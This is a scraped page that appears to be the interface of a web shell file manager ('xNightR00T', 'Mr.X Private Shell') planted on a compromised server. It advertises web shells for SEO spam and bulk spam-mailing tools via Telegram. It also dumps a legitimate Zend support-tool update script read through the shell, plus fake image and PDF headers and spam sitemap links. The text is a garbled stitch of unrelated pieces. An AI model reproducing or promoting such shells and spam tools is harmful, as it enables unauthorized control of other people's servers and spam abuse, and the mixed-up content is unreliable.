xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
#!/bin/bash
ZSST_PLUGIN_NAME="Support Tool Update"


if [ $NONSU ]; then
	echo "You need to be superuser to perform this operation."
	exit 1
fi

. $ZCE_PREFIX/share/support_tool/st_funcs.lib

function installLatest
{
	mkdir $ZCE_PREFIX/tmp/STlatest
	cd $ZCE_PREFIX/tmp/STlatest || exit 1

	if ! downloadtofile "https://github.com/zendtech/zs-support-tool/releases/latest/download/SupportToolMulti_LinuxSFX.tar.gz" ZSST_latest.tgz; then 
		echo -e "\n\nDownload from GitHub failed. You may find a more detailed error report above.\n"
		rm -rf "$ZCE_PREFIX/tmp/STlatest"
		exit 1
	fi

	tar xf ZSST_latest.tgz
	./SupportToolSFX.bin
	
	rm -rf "$ZCE_PREFIX/tmp/STlatest"
}

cd $ZCE_PREFIX/tmp || exit 1
if ! downloadtofile "https://api.github.com/repos/zendtech/zs-support-tool/releases/latest" online_ver.json; then 
	echo -e "\n\nConnection to GitHub failed. You may find a more detailed error report above.\n"
	exit 1
fi
latestBuild=$($ZCE_PREFIX/bin/php -n -r '$a=file_get_contents("online_ver.json"); $b=json_decode($a,true); echo $b["name"];')
rm -f online_ver.json
currentBuild=$($ZCE_PREFIX/bin/support_tool.sh -v | sed "s@^.*build @@")

echo
if [ "$currentBuild" = "$latestBuild" ]; then
	echo "There is no newer build available. Current build is   $currentBuild."
else
	echo "Installed build:  $currentBuild"
	echo "On-Line build:   $latestBuild"
fi
echo



if [ "$2" = "--check" ]; then
	exit 0
elif [ "$2" = "--auto" ]; then
	installLatest
else
	yesnocommand "Please confirm latest Support Tool build installation" "" installLatest
fi

Filemanager

Name Type Size Permission Actions
clean_notifications.sh File 713 B 0775
core_dump.sh File 5.32 KB 0775
simple_auth.sh File 1.25 KB 0775
update.sh File 1.51 KB 0775
zray_off.sh File 699 B 0775
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml